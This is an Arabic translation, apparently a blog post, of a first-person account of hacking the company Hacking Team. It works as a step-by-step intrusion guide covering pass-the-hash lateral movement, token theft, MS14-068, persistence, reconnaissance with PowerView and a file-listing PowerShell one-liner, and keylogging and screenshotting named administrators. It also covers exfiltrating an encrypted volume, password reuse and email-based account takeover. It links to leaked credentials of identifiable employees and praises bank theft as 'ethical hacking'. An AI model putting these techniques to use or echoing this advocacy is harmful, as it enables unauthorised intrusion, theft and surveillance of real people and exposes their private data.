ومن أجل وحدة matesploit و powershell empire و pth-winexe [6] تحتاج فقط ملف hash  وليس كلمة المرور. وهي الطريقة الأكثر شعبية ( وتعمل على أي جهاز كمبيوتر بنظام ويندوز و منفذ 445 ). ولكنها أقل سرية.
ولكن سيظهر نمط 7045 "نمط إدارة التحكم بالخدمة"  في سجل الأحداث.  وحسب تجربتي فإنه لم يلاحظ ذلك أحد خلال عملية قرصنة ولكنه يساعد المحققين غالبا في معرفة ما فعله الهاكر بعد ذلك.
2/  WMI :
إنه الأسلوب الأكثر سرية ، إن خدمة WMI مفعلة في كل أجهزة ويندوز باستثناء الخوادم التي سيحجبها الجدار الناري بشكل افتراضي.  
يمكنك استخدام   :
wmiexec.py [7] أو pth-wmis [6] (هنا استعراض لـ wmiexec و pth-wmis ]8[ )

invoke_wmi من Powershell Empire [9], أو أداة ويندوز المضمنة
   wmic [5].جميع هذه الأدوات تحتاج إلى ملف الهاش فقط ما عدا wmic .

3 : PSRemoting [10]
يتم تعطيله بشكل افتراضي. شخصيا لا أنصح بتمكين بروتوكولات جديدة.ولكن في حال قام مسؤول النظام بتمكينه فإن ذلك سيكون مريحا للغاية . خاصة في حال استخدام powershell  وخصوصا إذا كنت تستخدم بورشل في كل حاجة (يجب  استخدام ال powershell دائما . سيتم تغيير هذا السلوك في  [11]   powershell 5 و windows 10. ولكن powershell حاليا يسهل عمل أي شي في الذاكرة ويتجنب AV ويترك آثارا خفيفة) .
4/ جدولة المهام :
يمكنك تنفيذ البرامج عن بعد بواسطة  : at
وchtasks [5].
وهو يعمل نفس عمل psexec ويترك بصمةمعروفة [12] .
5/ GPO :
إذا تم تعطيل أو قفل جميع هذه البروتوكولات بواسطة جدار الحماية. فحالما تصبح مدير الشبكة فيمكنك استخدام GPO  لإعطاء المستخدمين سكربت دخول أو تثبيت msi  أو تنفيذ أمر مجدول[13],

أو كما سترون على جهاز كمبيوتر Mauro Romeo (أحد أعضاء إدارة فريق القرصنة) استخدمت  GPO  لتمكين  WMI و فتح الجدار الناري.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py


حركة في المكان"in place" :
1/  سرقة الرمز :
بمجرد الحصول على صلاحية المشرف على جهاز فيصبح بالإمكان الحصول على الرموز السرية للأعضاء الآخرين في النطاق واستخدامها للحصول على الموارد المختلفة  في شتى المجالات.
توجد أداتين للقيام بذلك :
incognito [1] و  mimikatz token::* commands [2].

 

2/ MS14-068

يمكنك الاستفادة من علة التحقق في kerberos   [3] [4][5] لإنشاء تذاكر لإدارة النطاق.
3/ تخطي ال hash :
إذا كان لديك تعريفة المستخدم ملف هاش ولم يقم بستجيل الدخول، فبإمكانك استخدام
sekurlsa::pth [2]
للحصول على رخصة أو صلاحية المستخدم .

4/ حقن العملية :

أي أمر من نوع RAT يمكنه دمج نفسه في العمليات الأخرى فمثلا التنقل  ما بين meterpreter و pupy [6] أو أمر psinject [7] من مشروع powershell empire
5/ runas :
هو احد أوامر ويندوز و يعتبر مفيدا جدا في بعض الأحيان لأنه لا يطلب الحصول على صلاحيات المدير.  هذا الأمر جزء من ويندوز ولكن إذا لم تكن تملك لواجهة رسومية يمكنك استخدام powershell  [8].

 

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

13-2  الاستمرار :
إذا كانت لديك صلاحية الوصول مرة واحدة  ،فإنك ستريد المحافظة عليها. الاستمرار هو التحدي الوحيد لمنافسة المتسكعين من أمثال "فريق القرصنة " الذي يقوم باستهداف النشطاء وغيرهم من الأفراد. عند اختراق الشركات، فإنك لست بحاجة للاستمرار لأن الشركات لا تنام.أنا استخدم نمط Duqu 2 للاستمرار، عن طريق التنفيذ في الذاكرة في عدة مخدمات لا تغلق إلا نادرا.  مع فرصة إمكانية إعادة تشغيلها جميعها في وقت واحد ويصبح بحوزتي كلمات المرور و التذكرة الذهبية  [1] كطريقة احتياطية للوصول.
بإمكانك الإطلاع على المزيد من التقنيات المختلفة للاستمرار من هنا  [2] [3] [4].
ولكن من أجل اختراق الشركات فأنت لست بحاجة إلى هذه العملية فهي تزيد من مخاطر الاكتشاف.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/
13...3 الاستكشاف الداخلي. .:
أفضل وسيلة في هذه الأيام لفهم شبكات ويندوز هي Powerview ]1] وكذلك جميع كتابات مؤلفها تستحق القراءة [2]  خاصة [3] [4]و [5] و[6]. كذلك يعتبرpowershell قويا في هذا المجال [7].
وبما أنه ما زالت توجد إصدارات من ويندوز لا تملك powershell مثل ويندوز 2000 و وويندوز 2003، لذا عليك بتعلم الطريقة القديمة[8] عن طريق برامج مثل netview.exe [9] أو أمر ويندوز المبني  "net view"
وهناك تقنيات أخرى أعجبت بها:
1) تحميل قائمة بأسماء الملفات :
بواسطة حساب المسؤول يمكنك تحميل قائمة بأسماء الملفات في الشبكة مع powerview :

 Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |    select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |    select fullname | out-file -append files.txt}

و لاحقا بإمكانك فراءتها في وقت فراغك واختيار أي الملفات التي ترغب بتنزيلها.
2) قراءة البريد الإلكتروني :
كما رأينا سابقا يمكن تحميل البريد الإلكتروني بواسطة powershell .إضافة إلى الكثير من المعلومات المهمة.
3) قراءة sharepoint :
وهو المكان الذي تحتفظ فيه الشركات عادة بمعلومات مهمة وبالإمكان تحميلها أيضا باستخدام powershell[10].
4 ) خادم الصلاحيات Active Directory  [11]:
يحوي الكثير من المعلومات حول الأجهزة والموظفين والكثير من المعلومات المهمة باستثناء معلومات الإدارة . ويمكنك الحصول على الكثير من المعلومات بواسطة powerview وغيرها من الأدوات [12]  .
في حال دخلت بصفة مدير فيمكنك فيجب عليك تصدير كل المعلومات بواسطة CSVDE  أو أي أداة أخرى.
5 ) التجسس على الموظفين :
من ضمن هواياتي المفضلة الإطاحة بمدراء الأنظمة. فقد مكنني التجسس على كريستيان بوزي (أحد إداريي فريق القرصنة ) من الوصول للخادم Nagios والذي أوصلني بدوره إلى Sviluppo (شبكة التطوير التي تحوي على الشفرة المصدرية لـ RCS) .ومع جمع بسيط من Get-Keystrokes و Get-TimedScreenshot
 من مشروع powersploit[13] بالإضافة مع استخدام
 Do-Exfiltration من مشروع Nishang  [14] و GPO  ستتمكن من التجسس على أي موظف وحتى على كل النطاق.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang

الإطاحة بمدراء الأنظمة :


بعد قراءة الوثائق المتعلقة بالبنية الداخلية [1] اكتشفت أني لا زلت بحاجة للوصول إلى أمر أكثر أهمية في  "Rete Sviluppo" وهي شبكة معزولة تحوي على شفرة RCS .
مدراء الأنظمة لأي شركة لديهم إمكانية الوصول إلى كل شيء في الشركة . لذا قمت بالبحث في أجهزة الكمبيوتر الخاصة ب Mauro Romeo و Cristian لمعرفة كيفية إدارة شبكة Sviluppo . واكتشاف إن كانت هناك أي شبكات مثيرة للاهتمام. لقد كان من السهل الوصول إلى أجهزتهم بسبب أنهم كانوا جزءا من نطاق الشركة و لأنه كان لدي صلاحيات الإدارة.
كان كمبيوتر Romeo ليس لديه منفذ مفتوح لذا قمت بفتح منفذ لـ  WMI [2]  وقمت بتشغيل  meterpreter  [3] بإضافة إلى مسجل لوحة المفاتيح والشاشة باستخدام Get-Keystrokes و Get-TimeScreenshot
وقد استعملت وحدات عدة من metasploit و من CredMan.ps1[4]
وبحثت عن أي ملفات مهمة [5]. وعندها رأيت  أن بوزي يملك قرصا مشفرا باستخدام Truecrypt انتظرت حتى قام بربطه فنسخته بالكامل .وقد ضحكت كثيرا بسبب ضعف كلمات مرور كريستيان بوتزي ( وكيف أنه وفر العديد من المواد [6] [7] [8] [9] ) وقد قمت بذكرها كطريقة تظليل وحتى أضحك منه. ولكن في الحقيقة   ( keyloggers وmimikatz ) تشكف كل كلمات المرور من دون تمييز.

 

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/

15... الجسر.. .:


الملفات المشفرة لدى كريستيان كانت تحوي الكثير من كلمات السر [1]. إحداها أوصلتني إلى الخادم Nagios والذي أوصلني بدوره إلى شبكة Sviluppo المراقب.
وبالتالي كنت سأحصل على الجسر الذي أرغب به.  كان الملف النصي يحوي على كلمة المرور لواجهة الويب ولكن كان هناك ثغرة في تشغيل البرنامج [2] (كانت ثغرة لا تتعلق بالصلاحيات ولكن كانت تتطلب أن يقوم أحد المستخدمين بإنشاء جلسة  والدخول للنظام والتي قمت باستخدام كلمة المرور لها من الملف النصي ).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78

16 . إعادة تعيين كلمات السر....


من خلال قراءة البريد الإلكتروني، لاحظت أن Daniele Milan
 لديه صلاحيات الوصول إلى مستودع git.  وكان لدي كلمة المرور لنظام ويندوز الخاص به سابقا بفضل mimikatz. قمت بتجريبها على خادم git وعملت، من ثم قمت جربت sudo وعمل. ومن أجل خادم gitlab و حسابهم على تويتر، استخدمت خاصية" نسيان كلمة المرور" بالإضافة إلى قدرتي على الوصول إلى بريدهم الإلكتروني لإعادة تعيين كلمة المرور.


17 ...الخاتمة.. .

هذا هو كل ما يتطلبه الأمر للإيقاع  بالشركة ووقف انتهاكاتهم لحقوق الإنسان.
هذا هو جمال وتناسق القرصنة: مع 100 ساعة من العمل، مضاها شخص واحد بإمكانها
إنهاء سنوات من العمل من شركة ذات ملايين من الدولارات.
 القرصنة تعطي للمستضعفين  فرصة للقتال والفوز .
غالبا ما تذيل أدلة القرصنة بالتالي:
 تنويه: هذه المعلومات لأغراض تعليمية فقط، وخدمة للهكر الأخلاقي، وليست بغرض مهاجمة الأنظمة التي لا تملك لها  إذن وصول، وما إلى ذلك .
وأنا أقول نفس الشيء ولكن أعود وأكد على مفهوم القرصنة الثوري. إن تسريب الوثائق، أومصادرة الأموال من البنوك، والعمل على تأمين الحواسيب من الناس العادية يعتبر قرصنة أخلاقية.
ومع ذلك، فإن معظم من يدعون أنفسهم "بالقراصنة الأخلاقيين" يعملون فقط من أجل تأمين أولئك الذين يدفعون رسوم الاستشارات العالية، والذين غالبا ما يكونون من الأغنياء. والذين يستحقون الاختراق فعلا .

[1] https://twitter.com/coracurrier/status/618104723263090688

18....راجع. .:


لمحاولة اختراقي أو تهديدي بالموت بالإيطالية  [1] [2] أو إعطائي نقاط ضعف 0days لبعض الشركات والحكومات والبنوك.
تواصل معي بالبريد المشرف رجاءا.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

Fahad الخميس, 2016/10/13 - 11:28ص
disqus

0 التعليقات:

إرسال تعليق